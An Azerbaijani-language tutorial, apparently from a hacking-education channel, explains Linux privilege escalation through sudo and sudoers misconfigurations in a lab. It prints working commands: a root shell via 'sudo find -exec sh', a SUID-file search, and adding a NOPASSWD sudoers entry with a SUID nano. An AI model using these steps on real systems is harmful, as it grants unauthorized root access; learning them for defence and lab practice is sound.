Linux Privilege Escalation nədir? Hansı təhlükəsizlik boşluqları var? Privilege Escalationda hansı məqamlara əsas fikir verilməlidir? sudoers nədir? /etc/sudoers nədir? sudoers faylı nədir? sudo nədir? Sudoers faylının köməyi ilə Privilege Escalation
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
SUDOERS Konfiqurasiya Faylı
sudo kommandası Linux/Unix əməliyyat sistemlərində səlahiyyətlərin bölünməsi üçün istifadə olunur.İstifadəçi öz parolunu daxil edərək və sudo kommandasından istifadə edərək yüksək səlahiyyətli əməliyyatları yerinə yetirə bilər.Sistemdə root istifadəçisi sistemdən istifadə edəcək istifadəçilərə yeni hesablar yaradaraq suoders faylına aşağı səlahiyyət ilə əlavə etməlidir.
sudo usermod -aG sudo (istifadəçi adı)
Bundan əlavə olaraq sistem administratoru sudoers konfiqurasiya faylını , /etc/sudoers dəyişərək daha ətraflı məhdudiyyətlər əlavə edə bilər.
Sudo ilə PrivEsc
Səlahiyyətləri yüksəltməyin və yüksək səlahiyyətləri əmrləri icra etməyin bir neçə növü vardır.Bizim bir xaker, kiber təhlükəsizlik mütəxəsisi kimi ilk məqsədimiz sistem üzərində zəif nöqtələrini aşkarlamaq və onları istismar etməkdir.Böyük bir sual yaranır, bəs biz hansı məqamlara diqqət etməli və axtarmalıyıq? Aşağıdakı məqamlar buna cavabdır:
- mətn redaktorlarına məsələn Vim və ya Nano SUİD bitinin olduğunu yoxlamaq.Məqsəd sudoers faylını redaktə etməkdir.
- sudo kommandasının istifadə yerləri barədə araşdırmaq.
- sudo kommandasını parolsuz icra etməyə cəhd edin.
Axtarış kommandalarından İstifadə
Yuxarıda 2-ci bəndə göstərilən sudo kommandasının istifadə yerlərini araşdırmaq üçün aşağıdakı kommandadan istifadə edə bilərik.
TCM@debian:~$ sudo -l
Matching Defaults entries for TCM on this host:
env_reset, env_keep+=LD_PRELOAD
User TCM may run the following commands on this host:
(root) NOPASSWD: /usr/bin/find
TCM adlı istifadəçi parol daxil etmədən find kommandasını root səlahiyyətləri ilə icra etmək icazəsi vardır. Bu kommandasnın köməyi ilə necə səlahiyyətlərimizi artıracağımızı öyrənək.find kommandası ilə exec parametrindən istifadə edin və root shell əldə edin:
TCM@debian:~$ sudo find / -exec sh -i \;
sh-4.1# whoami
root
sh-4.1# id
uid=0(root) gid=0(root) groups=0(root)
Bu Səlahiyyətlərin artırılması üçün istifadə edilən üsullardan biridir.Siz həmin siyahıda olan proqram və alətlər üçündə tətbiq edə bilərsiniz.
Sudoers faylının Redaktə Edilməsi
Yaddınızda saxlayın istənilən SUİD biti quraşdırılmış mətn redaktoru (Vim və ya Nano) bizə /etc/sudoers faylını redaktə etməyə və dəyişməyə icazə verir.
İlk öncə hədəf Linux cihazında SUİD biti quraşdırılmış faylların axtarışını yerinə yetirək.
TCM@debian:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/sudoedit
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chfn
/usr/local/bin/suid-so
/usr/local/bin/suid-env
/usr/local/bin/suid-env2
/usr/sbin/exim-4.84-3
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/bin/ping6
/bin/nano
/bin/ping
/bin/mount
/bin/su
/bin/umount
/sbin/mount.nfs
Nano mətn redaktoru siyahıda qarşımıza çıxmışdır məhz SUİD biti olduğuna görə mən onu sudoers faylının redaktə etmək üçün istifadə edə bilərəm: nano /etc/sudoers.Konfiqurasiya faylı yükləndikdən sonra mən həmin fayla elliot istifadəçisinə sudo səlahiyyətləri əlavə edəcəm.
%sudo ALL=(ALL) ALL
#
#includedir /etc/sudoers.d
elliot ALL=(ALL) NOPASSWD: ALL
elliot@debian:/home/user$ sudo -l
Matching Defaults entries for elliot on this host:
env_reset, env_keep+=LD_PRELOAD
User elliot may run the following commands on this host:
(ALL) NOPASSWD: ALL
Birdaha dəyişikliyin getdiyini görmək üçün shell-dən çıxın və yenidən daxil olun.Elliot istifadəçisi sudo -l kommandasını icra etməklə nə edə biləcəyini görür.(ALL) NOPASSWD: ALL ilə bütün əməliyyatları parolsuz bir şəkildə yerinə yetirə biləcəyini bilərək sudo kommandasından istifadə edərək root shell əldə edir.
elliot@debian:/home/user$ sudo sh -i
sh-4.1# exit
exit
elliot@debian:/home/user$ sudo su
root@debian:/home/user#
Burada iki üsull ilə root shell ala bilirik.
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat